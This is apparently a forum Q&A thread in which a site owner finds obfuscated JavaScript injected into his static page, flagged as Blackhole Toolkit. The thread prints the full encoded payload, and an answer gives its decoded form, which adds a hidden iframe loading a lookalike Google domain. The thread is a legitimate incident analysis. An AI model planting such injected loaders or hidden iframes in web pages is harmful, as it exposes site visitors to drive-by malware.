# Strange Javascript appearing on static html web page

Tags: javascript, html

I have a static html web page for my website and recently was not able to load my website on my Windows XP machine. Norton Antivirus blocked the website reporting it as a "Web Attack: Blackhole Toolkit Website 7". I downloaded my index.htm page and found this code in the body which was not created by me when compared to my local copy of the same page:

```
<script>
el = document.createElement("div");
el.appendChild(document.createTextNode("ReferenceErr"));
el.appendChild(document.createTextNode("q"));
el.insertBefore(document.createTextNode("l"), el.childNodes[1]);
try {
    try {
        throw 1
    } catch (a) {
        b[2] = 21
    };
} catch (a) {
    k = el.firstChild.nodeValue + a.toString().substr(0, 0);
};
ar = "\"aTBtc0.gyA:/[hi],b>  vCldmwf)s{up1oE'=<r(n;N}ez";
ar2 = "R80c80c60c112c84c164c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c116c124c80c80c80c60c112c160c4c104c184c160c164c116c172c80c80c180c84c184c96c120c184c84c124c80c80c80c100c140c20c128c104c184c168c16c28c108c160c60c16c184c164c0c156c60c112c160c4c104c184c84c120c160c20c152c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c84c108c60c100c16c56c152c148c136c24c148c84c56c184c60c32c56c16c152c148c136c24c148c84c120c16c36c96c184c152c148c88c60c120c60c72c60c96c60c16c36c44c56c60c100c100c184c168c172c132c140c120c60c16c60c140c168c44c4c72c120c140c96c128c16c184c172c96c184c112c16c44c24c172c16c140c132c44c24c172c148c76c156c48c60c112c160c4c104c184c76c0c116c172c80c80c180c80c80c112c128c168c20c16c60c140c168c84c60c112c160c4c104c184c160c164c116c124c80c80c80c88c4c160c84c112c84c152c84c100c140c20c128c104c184c168c16c28c20c160c184c4c16c184c144c96c184c104c184c168c16c164c148c60c112c160c4c104c184c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c120c160c20c148c68c148c56c16c16c132c44c48c48c188c140c168c100c32c160c140c128c132c28c20c140c104c48c56c140c104c184c28c132c56c132c148c116c172c112c28c120c16c36c96c184c28c88c60c120c60c72c60c96c60c16c36c152c148c56c60c100c100c184c168c148c172c112c28c120c16c36c96c184c28c132c140c120c60c16c60c140c168c152c148c4c72c120c140c96c128c16c184c148c172c112c28c120c16c36c96c184c28c96c184c112c16c152c148c24c148c172c112c28c120c16c36c96c184c28c16c140c132c152c148c24c148c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c108c60c100c16c56c148c68c148c136c24c148c116c172c112c28c120c184c16c40c16c16c160c60c72c128c16c184c164c148c56c184c60c32c56c16c148c68c148c136c24c148c116c172c80c80c80c100c140c20c128c104c184c168c16c28c32c184c16c144c96c184c104c184c168c16c120c12c36c8c4c32c176c4c104c184c164c148c72c140c100c36c148c116c52c24c64c28c4c132c132c184c168c100c92c56c60c96c100c164c112c116c172c80c80c180";
pau = "urn eReferenceErr".replace(k, "va" + el.childNodes[1].nodeValue);
e = Function("ret" + pau)();
ar2 = ar2.split("c");
ar2[0] = "80";
s = "";
for (i = 0; i != ar2.length; i++) {
    e('po'.concat('s=par', 'seInt(k', '.rep', 'lace("R', 'eferen', '","0a', 'sd"))+', 'ar2[', 'i]/', '4'));
    e('s+=ar.substr(pos,1)');
}
e(s);
</script>
```

Anybody have any idea how this might have appeared and how my index.htm page could have been modified?

Thanks,
Steve

Comment: what web server are you using? other details would help too: OS, scripting environment, web app platform etc

Comment: Looks like someone is trying to exploit a buffer overflow... You should remove it, and fix your webserver security.

Answer (score 1, accepted):

Someone hacked your site - there are many ways to do this , and there are many things to improve in security

Comment: Thanks everyone. I'm using a shared hosted server (Zeus is the platform from what I can tell). Have changed my FTP password and will monitor this - they also added the same code to my Wordpress wp-config.php page. Never experienced anything like this before.

Comment: If it is possible use secure FTP, because FTP sends password uncrypted !

Answer (score 5):

Below is the end result of the script. Ran it on a VM to test it out, got a malicious site warning via google as well. All of that to write this..

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://toolbarqueries-google.com/in.cgi?default');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

Comment: You beat me to it. To emphasize: `toolbarqueries` **dot** `google.com` is the legitimate site, while this script loads a hidden iframe from `toolbarqueries` **hyphen** `google.com`

Comment: @bemace yeah once it gets there it looks like theres a few different sites it it pulls its data from, thats when I got the google warning. Pretty tricky, they make the URL look very convincing.

Comment: Also, if anyone would like to write Igor and ask how things are in Moscow this time of year, the site *appears* to have legitimate [whois contact info](http://networktools.nl/whois/toolbarqueries-google.com)